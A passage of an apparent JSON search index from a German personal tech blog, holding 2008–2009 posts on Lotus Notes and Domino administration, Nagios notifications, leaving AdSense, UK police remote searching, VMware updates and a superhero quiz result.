bleibt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-06-25-neues-und-termine/","title":"Neues und Termine"},{"body":"Ich habe schon öfter gelesen, daß man nach der Installation des eclipsebasierten Notesclients (Standard Client) den Ordner defragmentieren soll. Mir war nur nie klar, wie.\nIch hab jetzt contig von Sysinternals (inzwischen Microsoft) probiert und das funktioniert sehr gut. Mein Aufruf war contig -s c: und nach wenigen Minuten, war der Vorgang beendet. Der Notesclient öffnet tatsächlich um einiges performanter.\n","excerpt":"\u003cp\u003eIch habe schon öfter gelesen, daß man nach der Installation des\neclipsebasierten Notesclients (Standard Client) den Ordner\ndefragmentieren soll. Mir war nur nie klar, wie.\u003c/p\u003e\n\u003cp\u003eIch hab jetzt\n\u003ca href=\"http://technet.microsoft.com/de-de/sysinternals/bb897428.aspx\" target=\"_blank\"\u003econtig \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nvon \u003ca href=\"http://technet.microsoft.com/de-de/sysinternals/\" target=\"_blank\"\u003eSysinternals \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\n(inzwischen Microsoft) probiert und das funktioniert sehr gut. Mein\nAufruf war contig -s c: und nach wenigen Minuten, war der Vorgang\nbeendet. Der Notesclient öffnet tatsächlich um einiges performanter.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-31-notes-ordner-defragmentieren/","title":"Notes Ordner defragmentieren"},{"body":"So, nachdem Google Adsense ab April interessenbezogene Werbung schalten möchte und dazu eine Anpassung in der Datenschutzbestimmung der Webseiten empfiehlt.\nGoogle verknüpft also noch stärker die Informationen die wir beim Surfen hinterlassen. Der Besuch einer bestimmten Kategorie von Seiten bringt dann verstärkt Werbung aus diesem Bereich. Es wird also nicht mehr zur Webseite passende, sondern zum User passende Werbung angezeigt.\n[…] Mithilfe der Arten von Webseiten, die Nutzer innerhalb des Google Content-Werbenetzwerks aufrufen, entwickeln wir Interessenkategorien. Beispiel: Falls ein Nutzer eine Reihe von Sportseiten besucht, wird er der Interessenkategorie “sportbegeistert” hinzugefügt. […]\nIch möchte nicht, daß die Leser meiner Seiten in diese Kategorien gepresst werden und steige daher aus Adsense aus. Hab eh nie was bekommen, aber ich glaube das ist wie Lotto spielen. Man hofft immer auf den großen Gewinn, ohne wirklich was dafür getan zu haben.\nWundert euch nicht über die [ad]-Tags in manchen Blogposts, das kommt von der Deaktivierung des Adsense-Plugins in WordPress, da ich nicht jeden Post wieder editieren möchte.\nMein neues Joomla-Projekt ist bereits Adsensefrei, ich weiß noch nicht, ob ich eine andere Werbeplattform benutze, oder die Seiten komplett werbefrei belassen werde. Jetzt nur noch das Wiki umstellen, dann bin ich das Zeug los.\n","excerpt":"\u003cp\u003eSo, nachdem Google Adsense ab April interessenbezogene Werbung schalten\nmöchte und dazu eine Anpassung in der Datenschutzbestimmung der\nWebseiten empfiehlt.\u003c/p\u003e\n\u003cp\u003eGoogle verknüpft also noch stärker die Informationen die wir beim Surfen\nhinterlassen. Der Besuch einer bestimmten Kategorie von Seiten bringt\ndann verstärkt Werbung aus diesem Bereich. Es wird also nicht mehr zur\nWebseite passende, sondern zum User passende Werbung angezeigt.\u003c/p\u003e\n\u003cp\u003e[…] Mithilfe der Arten von Webseiten, die Nutzer innerhalb des Google\nContent-Werbenetzwerks aufrufen, entwickeln wir Interessenkategorien.\nBeispiel: Falls ein Nutzer eine Reihe von Sportseiten besucht, wird er\nder Interessenkategorie “sportbegeistert” hinzugefügt. […]\u003c/p\u003e\n\u003cp\u003eIch möchte nicht, daß die Leser meiner Seiten in diese Kategorien\ngepresst werden und steige daher aus Adsense aus. Hab eh nie was\nbekommen, aber ich glaube das ist wie Lotto spielen. Man hofft immer auf\nden großen Gewinn, ohne wirklich was dafür getan zu haben.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-13-adsense-nervt/","title":"Google Adsense nervt"},{"body":"Mich würde als weitere Notification-Methode eine Alarmierung über Jabber interessieren, daher habe ich heute Tests mit sendxmpp gemacht.\nInstalliert habe ich wie in der Anleitung im Nagios-Wiki beschrieben.\nDie Nachrichten habe ich als Absender vom jabber.ccc.de gesendet und Empfänger ist mein Googlemail -Benutzer. Die Nachrichten gehen raus, werden aber weder im Google-Chat-Client, noch in Adium oder Pidgin angezeigt. Nur in der Ansicht Chats im Googlemail sind die Nachrichten vorhanden.\nUnd es ist vollkommen egal, ob der jabber.ccc.de-Benutzer in einem IM-Client aktiv ist, oder nicht. Absender Googlemail kam gar nicht an, da kommt aber eine Fehlermeldung beim Versand.\nHat da jemand eine Idee?\n","excerpt":"\u003cp\u003eMich würde als weitere Notification-Methode eine Alarmierung über Jabber\ninteressieren, daher habe ich heute Tests mit sendxmpp gemacht.\u003c/p\u003e\n\u003cp\u003eInstalliert habe ich wie in der\n\u003ca href=\"http://www.nagios-wiki.de/nagios/howtos/sendxmpp\" target=\"_blank\"\u003eAnleitung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n im\n\u003ca href=\"http://www.nagios-wiki.de\" target=\"_blank\"\u003eNagios-Wiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n beschrieben.\u003c/p\u003e\n\u003cp\u003eDie Nachrichten habe ich als Absender vom\n\u003ca href=\"http://web.jabber.ccc.de/\" target=\"_blank\"\u003ejabber.ccc.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gesendet und Empfänger ist mein\n\u003ca href=\"http://mail.google.com\" target=\"_blank\"\u003eGooglemail \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Benutzer. Die Nachrichten gehen raus,\nwerden aber weder im Google-Chat-Client, noch in Adium oder Pidgin\nangezeigt. Nur in der Ansicht Chats im Googlemail sind die Nachrichten\nvorhanden.\u003c/p\u003e\n\u003cp\u003eUnd es ist vollkommen egal, ob der jabber.ccc.de-Benutzer in einem\nIM-Client aktiv ist, oder nicht. Absender Googlemail kam gar nicht an,\nda kommt aber eine Fehlermeldung beim Versand.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-nagios-notifications-an-jabber-google-chat/","title":"Nagios Notifications an Jabber / Google-Chat"},{"body":"Habe gestern einen Artikel auf atnotes.de gelesen, dass Ulrich ein Phttp://www.eknori.de/2009-03-11/move-database-issue-in-nd85/[roblem mit dem verschiebenen eines Mailfiles auf einem Clustermember] hat.\nInteressanterweise hatte ich heute einen Support-Call, der den gleichen Fehler beschreibt. Auf dem Homeserver funktioniert das Verschieben, auf dem Cluster-Member nicht.\nIch teste noch bisschen und schreib dann noch paar Details. Werde morgen mal auf unserem Cluster einen Testuser verschieben, mal sehen, ob das funktioniert.\n","excerpt":"\u003cp\u003eHabe gestern einen Artikel auf atnotes.de gelesen, dass\n\u003ca href=\"http://www.eknori.de\" target=\"_blank\"\u003eUlrich \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ein\nPhttp://www.eknori.de/2009-03-11/move-database-issue-in-nd85/[roblem mit\ndem verschiebenen eines Mailfiles auf einem Clustermember] hat.\u003c/p\u003e\n\u003cp\u003eInteressanterweise hatte ich heute einen Support-Call, der den gleichen\nFehler beschreibt. Auf dem Homeserver funktioniert das Verschieben, auf\ndem Cluster-Member nicht.\u003c/p\u003e\n\u003cp\u003eIch teste noch bisschen und schreib dann noch paar Details. Werde morgen\nmal auf unserem Cluster einen Testuser verschieben, mal sehen, ob das\nfunktioniert.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-domino-move-database-with-adminp/","title":"Domino: Move Database with Adminp"},{"body":"Irgendwie komme ich im Moment nicht zum Bloggen. Mich interessieren so viele Dinge und ich beschäftige mich mit verschiedenen Projekten gleichzeitig.\nJoomla : Ich überlege, ob ich nicht WordPress aufgebe und zu Joomla wechsle, da habe ich dann doch mehr Möglichkeiten Artikel zu posten, die man auch sauber verlinken kann.\nIch bereite eine Nagios Presentation vor. Schwerpunkt wird das http://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_- laestiges_uebel_oder_sinnvolle_Prophylaxe_Netzwerkueberwachung_mit?open\u0026amp;l=DE\u0026amp;ccm=010008[Monitoring von Lotus Domino]. Hierzu nutze ich Ubuntu , SNMPTT und ein paar weitere Tools.\nIrgendwie hab ich SNMPTT mit den Anleitungen nicht zum Laufen gebracht. Das Init-Skript funktioniert überhaupt nicht. Auch nicht, wenn ich /etc/init.d/skeleton nach functions kopiere. Dann startet v.a. Nagios nicht mehr. Hab mir jetzt ein neues Init-Skript gebaut. Wenn es sauber läuft, gibt’s hier nen Download.\nNagios 3.0.6 finde ich super gelungen. Ich war mit den 2er Versionen schon begeistert, jetzt ist die Installation einfacher und einige kleine Verbesserungen überzeugen einfach.\nDas Wiki für das notestutorial gefällt mir schon lange nicht mehr. Ich bin mir noch nicht sicher, ob ich den Inhalt in Joomla integriere, oder ein anderes Wiki-System benutze. Dummerweise läuft mein Favorit Foswiki nicht auf meinem 1\u0026amp;1 Webspace.\nAußerdem beteilige ich mich in verschiedenen Foren, Web 2.0 Projekten und poste ab und zu auf Twitter. (www.twitter.com/stoeps )\nEs bleibt also spannend. :-)\n","excerpt":"\u003cp\u003eIrgendwie komme ich im Moment nicht zum Bloggen. Mich interessieren so\nviele Dinge und ich beschäftige mich mit verschiedenen Projekten\ngleichzeitig.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.joomla.org\" target=\"_blank\"\u003eJoomla \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: Ich überlege, ob ich nicht\n\u003ca href=\"http://www.wordpress.org\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n aufgebe und zu Joomla wechsle, da\nhabe ich dann doch mehr Möglichkeiten Artikel zu posten, die man auch\nsauber verlinken kann.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIch bereite eine \u003ca href=\"http://www.nagios.org\" target=\"_blank\"\u003eNagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Presentation vor.\nSchwerpunkt wird das \u003ca href=\"http://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_-\" target=\"_blank\"\u003ehttp://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_- \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003cem\u003elaestiges_uebel_oder_sinnvolle_Prophylaxe_Netzwerkueberwachung_mit\u003c/em\u003e?open\u0026amp;l=DE\u0026amp;ccm=010008[Monitoring von Lotus Domino]. Hierzu nutze ich \u003ca href=\"http://www.ubuntu-linux.com\" target=\"_blank\"\u003eUbuntu \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://www.snmptt.org\" target=\"_blank\"\u003eSNMPTT \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und ein paar weitere Tools.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eIrgendwie hab ich SNMPTT mit den \u003ca href=\"http://www.snmptt.org/docs/snmptt.shtml#Installation-Overview\" target=\"_blank\"\u003eAnleitungen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n nicht zum Laufen gebracht. Das Init-Skript funktioniert überhaupt nicht. Auch nicht, wenn ich /etc/init.d/skeleton nach functions kopiere. Dann startet v.a. Nagios nicht mehr. Hab mir jetzt ein neues Init-Skript gebaut. Wenn es sauber läuft, gibt’s hier nen Download.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-viel-zu-tun-2/","title":"Viel zu tun"},{"body":"Bei Notes 8.5 blockiert der notes.ini Parameter “UseBasicNotes=1” die Ausführung des Designers!\nvia Eknori – No Designer When Running in Basic Mode ","excerpt":"\u003cp\u003eBei Notes 8.5 blockiert der notes.ini Parameter “UseBasicNotes=1” die\nAusführung des Designers!\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.eknori.de/\" target=\"_blank\"\u003eEknori \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n –\n\u003ca href=\"http://www.eknori.de/2009-01-07/notes-85-no-designer-when-running-in-basic-mode/\" target=\"_blank\"\u003eNo\nDesigner When Running in Basic Mode \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-eknoride-no-designer-when-running-in-basic-mode/","title":"eknori.de: No Designer When Running in Basic Mode"},{"body":"Ich dachte eigentlich, daß die Briten nicht mehr viel tun können, um eine allumfassende Überwachung auf die Beine zu stellen. Aber die neueste Idee finde ich sehr bedenklich.\nOhne richterliche Anordnung soll es Polizei und Geheimdienst erlaubt sein, in Rechner einzudringen. Dies wird unter dem verniedlichendem Begriff “Remote Searching” auch von einem EU Council gedeckt.\n[…] The hacking is known as “remote searching”. It allows police or MI5 officers who may be hundreds of miles away to examine covertly the hard drive of someone’s PC at his home, office or hotel room. […]\nZitat aus: Times Online Hier wird wieder unter dem Deckmantel, daß eine EU-Richtlinie umgesetzt wird, ein Bürgerrecht mit Füßen getreten. Im Gegensatz zum “Bundestrojaner” bzw. dem neuen BKA-Gesetz fällt hier der Richtervorbehalt, der auch in Deutschland in letzter Minute eingebracht wurde:\nA remote search can be granted if a senior officer says he “believes” that it is “proportionate” and necessary to prevent or detect serious crime — defined as any offence attracting a jail sentence of more than three years.\nZitat aus: Times Online Hier wird nicht mal mehr unter dem Deckmantel der Terrorabwehr gehandelt, auch mittelschwere Verbrechen sollen hier der Auslöser für den Einbruch die Remote-Suche in einen Computer sein. Wie kann man sich da eigentlich sicher sein, ob einem nicht “Beweise” untergeschoben werden? Der Eindringling nutzt Sicherheitslücken und führt Programme bzw. Suchen mit dem aktuell angemeldeten Benutzernamen oder als Administrator aus.\nIch will niemand was unterstellen, aber in Deutschland wurde z.B. ein Angeklagter freigesprochen, weil ein Sachverständiger bestätigte, daß nach der Konfiszierung des Rechners Dateien verändert bzw. erstellt und gelöscht wurden. Das geht dann aber nicht mehr, wenn direkt zugriffen werden darf!\nSiehe: Nachrichten Heute: Der Bundestrojaner und die unterschobene Straftat Die Informationen können dann auch von anderen “Ordnungshütern” aus EU-Ländern wie Frankreich oder Deutschland angefordert bzw. beauftragt werden.\nvia Chris Linfoot http://feeds.feedburner.com/ r/ChrisLinfoot/3/507018693/CWLT-7N5CBP[Big Brother is Hacking You]\n","excerpt":"\u003cp\u003eIch dachte eigentlich, daß die Briten nicht mehr viel tun können, um\neine allumfassende Überwachung auf die Beine zu stellen. Aber die\nneueste Idee finde ich sehr bedenklich.\u003c/p\u003e\n\u003cp\u003eOhne richterliche Anordnung soll es Polizei und Geheimdienst erlaubt\nsein, in Rechner einzudringen. Dies wird unter dem verniedlichendem\nBegriff “Remote Searching” auch von einem EU Council gedeckt.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] The hacking is known as “remote searching”. It allows police or MI5\nofficers who may be hundreds of miles away to examine covertly the hard\ndrive of someone’s PC at his home, office or hotel room. […]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eZitat aus:\n\u003ca href=\"http://www.timesonline.co.uk/tol/news/politics/article5439604.ece\" target=\"_blank\"\u003eTimes\nOnline \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eHier wird wieder unter dem Deckmantel, daß eine EU-Richtlinie umgesetzt\nwird, ein Bürgerrecht mit Füßen getreten. Im Gegensatz zum\n“Bundestrojaner” bzw. dem neuen BKA-Gesetz fällt hier der\nRichtervorbehalt, der auch in Deutschland in letzter Minute eingebracht\nwurde:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-britische-polizei-sollen-prophylaktisch-hacken-durfen/","title":"Britische Polizei soll private und geschäftliche Computer hacken dürfen"},{"body":"Es gibt ein Problem beim Einrichten von DCT unter Vista mit aktiviertem UAC. Man sollte bei der Erstkonfiguration das UAC (falls nicht sowieso deaktivert) besser ausschalten.\nOn XP or a Vista machine with UAC turned off this is no problem, the files are deployed and you are prompted to restart your Notes client but with UAC turned on it runs into a bit of an issue, the files to be deployed to the Notes executable directory don’t get deployed and because it’s the notes client trying to put the file onto the hard drive the usual UAC prompt does not pop up. Even if the file deployment fails you will still be asked to restart your notes client and you wont know there is anything wrong till you start DCT again and your asked to restart the notes client yet again.\nvia Dec’s Dom Blog ","excerpt":"\u003cp\u003eEs gibt ein Problem beim Einrichten von DCT unter Vista mit aktiviertem\nUAC. Man sollte bei der Erstkonfiguration das UAC (falls nicht sowieso\ndeaktivert) besser ausschalten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eOn XP or a Vista machine with UAC turned off this is no problem, the\nfiles are deployed and you are prompted to restart your Notes client but\nwith UAC turned on it runs into a bit of an issue, the files to be\ndeployed to the Notes executable directory don’t get deployed and\nbecause it’s the notes client trying to put the file onto the hard drive\nthe usual UAC prompt does not pop up. Even if the file deployment fails\nyou will still be asked to restart your notes client and you wont know\nthere is anything wrong till you start DCT again and your asked to\nrestart the notes client yet again.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-domino-configuration-tuner-and-vistas-uac-dont-mix/","title":"Domino Configuration Tuner and Vista’s UAC Don’t Mix"},{"body":"Ich weiß nicht, ob mich das beruhigen oder beunruhigen sollte?\n[…] die wachsende Zahl an Informationen in modernen, atomgetriebenen U-Booten zu verarbeiten und die Waffensysteme zu kontrollieren. […]\nHeise News ","excerpt":"\u003cp\u003eIch weiß nicht, ob mich das beruhigen oder beunruhigen sollte?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] die wachsende Zahl an Informationen in modernen, atomgetriebenen\nU-Booten zu verarbeiten und die Waffensysteme zu kontrollieren. […]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/Windows-fuer-britische-Atom-U-Boote--/meldung/120633\" target=\"_blank\"\u003eHeise\nNews \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-12-18-windows-fur-britische-atom-u-boote/","title":"Windows für britische Atom-U-Boote"},{"body":"Seinen Blog findet man unter folgender URL: http://blog.nashcom.de/ . Ich bin gespannt auf die Texte. Ich fand seine Artikel im “Groupware Magazin” immer sehr unterhaltsam.\nvia Bob Balaban’s Blog “In Theory” ","excerpt":"\u003cp\u003eSeinen Blog findet man unter folgender URL: \u003ca href=\"http://blog.nashcom.de/\" target=\"_blank\"\u003ehttp://blog.nashcom.de/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Ich\nbin gespannt auf die Texte. Ich fand seine Artikel im “Groupware\nMagazin” immer sehr unterhaltsam.\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.bobzblog.com/tuxedoguy.nsf/feed.rss\" target=\"_blank\"\u003eBob Balaban’s Blog\n“In Theory” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-12-15-daniel-nashed-bloggt-jetzt-auch/","title":"Daniel Nashed bloggt jetzt auch"},{"body":"Vmware Server 2 und Vmware Workstation stehen bei www.vmware.com zum Download bereit.\nDiese Seite hab ich grad dazu entdeckt: VMFAQ . Eventuell ist ja was interessantes dabei.\n","excerpt":"\u003cp\u003eVmware Server 2 und Vmware Workstation stehen bei\n\u003ca href=\"http://www.vmware.com\" target=\"_blank\"\u003ewww.vmware.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zum Download bereit.\u003c/p\u003e\n\u003cp\u003eDiese Seite hab ich grad dazu entdeckt: \u003ca href=\"http://vmfaq.com/\" target=\"_blank\"\u003eVMFAQ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nEventuell ist ja was interessantes dabei.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-24-vmware-updates/","title":"Vmware Updates"},{"body":"Your results:\nYou are Spider-Man\n\u0026lt;td\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Spider-Man \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=85\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 85% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Superman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=70\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 70% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Hulk \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=65\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 65% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Robin \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=60\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 60% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Green Lantern \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=55\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 55% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Batman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=50\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 50% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Supergirl \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; The Flash \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Iron Man \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=45\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 45% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Wonder Woman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=35\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 35% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;tr\u0026gt; \u0026lt;td\u0026gt; Catwoman \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; \u0026lt;hr ALIGN=LEFT NOSHADE SIZE=4 WIDTH=25\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; 25% \u0026lt;/td\u0026gt; \u0026lt;/tr\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;/td\u0026gt; \u0026lt;td\u0026gt; You are intelligent, witty, \u0026lt;br /\u0026gt;a bit geeky and have great\u0026lt;br /\u0026gt; power and responsibility.\u0026lt;br /\u0026gt; \u0026lt;img SRC=\u0026#34;http://www.thesuperheroquiz.com/pics/spidy.gif\u0026#34; /\u0026gt; \u0026lt;/td\u0026gt; Click here to take the “Which Superhero am I?” quiz… Via Eknori ","excerpt":"\u003cp\u003eYour results:\u003cbr\u003e\n\u003cstrong\u003eYou are Spider-Man\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;table\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Spider-Man\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=85\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 85%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Superman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=70\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 